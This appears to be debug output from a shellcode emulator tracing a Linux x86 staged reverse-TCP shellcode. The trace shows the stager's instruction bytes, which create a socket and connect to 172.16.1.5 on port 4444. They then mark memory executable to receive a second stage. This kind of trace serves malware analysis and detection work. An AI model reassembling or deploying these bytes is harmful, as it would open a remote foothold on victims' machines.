graph file staged_shell_reverse_tcp.dot
verbose = 3
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417000
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417000
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 6A0A                            push byte 0xa
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417002
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 5E                              pop esi
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417003
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fce  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 31DB                            xor ebx,ebx
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417005
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fce  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] F7E3                            mul ebx
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417007
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fce  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 53                              push ebx
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417008
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fca  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 43                              inc ebx
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417009
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fca  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 53                              push ebx
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x0041700a
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 6A02                            push byte 0x2
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x0041700c
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] B066                            mov al,0x66
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x0041700e
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 89E1                            mov ecx,esp
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417010
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] CD80                            int 0x80
int socket(int domain=2, int type=1, int protocol=0);
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417012
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x0000000e  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 97                              xchg eax,edi
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417013
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 5B                              pop ebx
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417014
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000002
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 68AC100105                      push dword 0x50110ac
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417019
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000002
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 680200115C                      push dword 0x5c110002
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x0041701e
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000002
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fbe  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 89E1                            mov ecx,esp
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417020
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fbe  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 6A66                            push byte 0x66
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417022
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fba  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 58                              pop eax
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417023
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fbe  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 50                              push eax
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417024
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fba  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 51                              push ecx
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417025
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb6  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 57                              push edi
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417026
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 89E1                            mov ecx,esp
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417028
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000002
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 43                              inc ebx
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417029
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: PF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] CD80                            int 0x80
connect
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x0041702b
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: PF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 85C0                            test eax,eax
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x0041702d
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 7919                            jns 0x1b
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417048
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] B207                            mov dl,0x7
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x0041704a
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000007  ebx=0x00000003
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] B900100000                      mov ecx,0x1000
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x0041704f
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00001000  edx=0x00000007  ebx=0x00000003
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] 89E3                            mov ebx,esp
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417051
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00001000  edx=0x00000007  ebx=0x00416fb2
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] C1EB0C                          shr ebx,0xc
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417054
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00001000  edx=0x00000007  ebx=0x00000416
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: CF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] C1E30C                          shl ebx,0xc
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417057
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00001000  edx=0x00000007  ebx=0x00416000
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: CF PF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] B07D                            mov al,0x7d
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x00417059
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x0000007d  ecx=0x00001000  edx=0x00000007  ebx=0x00416000
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: CF PF 
[emu 0x0x1dfd370 [31;1mdebug[0m ] CD80                            int 0x80
stepcount 32
copying vertexes
optimizing graph
vertex 0x1e8daf0
going forwards from 0x1e8daf0
 -> vertex 0x1e8dbc0
 -> vertex 0x1e8dcd0
 -> vertex 0x1e8e0f0
 -> vertex 0x1e8e260
 -> vertex 0x1e8e510
 -> vertex 0x1e8e7c0
 -> vertex 0x1e8ea70
 -> vertex 0x1e8ee90
 -> vertex 0x1e8f170
copying edges for 0x1e8f170
 -> 0x1e97eb0
vertex 0x1e8f450
going forwards from 0x1e8f450
copying edges for 0x1e8f450
 -> 0x1e97fe0
vertex 0x1e8faa0
going forwards from 0x1e8faa0
 -> vertex 0x1e8fb70
 -> vertex 0x1e8fce0
 -> vertex 0x1e8ff90
 -> vertex 0x1e90270
 -> vertex 0x1e906c0
 -> vertex 0x1e909a0
 -> vertex 0x1e90b10
 -> vertex 0x1e90dc0
 -> vertex 0x1e91070
 -> vertex 0x1e91320
 -> vertex 0x1e91740
copying edges for 0x1e91740
 -> 0x1e990e0
vertex 0x1e918b0
going forwards from 0x1e918b0
copying edges for 0x1e918b0
 -> 0x1e99250
vertex 0x1e923e0
going forwards from 0x1e923e0
 -> vertex 0x1e924b0
 -> vertex 0x1e92620
 -> vertex 0x1e928d0
 -> vertex 0x1e92cf0
 -> vertex 0x1e92fd0
 -> vertex 0x1e932b0
 -> vertex 0x1e93590
copying edges for 0x1e93590
vertex 0x1e93870
going forwards from 0x1e93870
copying edges for 0x1e93870
[emu 0x0x1dfd370 [31;1mdebug[0m ] cpu state    eip=0x0041705b
[emu 0x0x1dfd370 [31;1mdebug[0m ] eax=0x0000007d  ecx=0x00001000  edx=0x00000007  ebx=0x00416000
[emu 0x0x1dfd370 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x1dfd370 [31;1mdebug[0m ] Flags: CF PF 
int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int connect (
     int sockfd = 14;
     struct sockaddr_in * serv_addr = 0x00416fbe => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 83955884 (host=172.16.1.5);
             };
             char sin_zero = "       ";
         };
     int addrlen = 102;
) =  0;
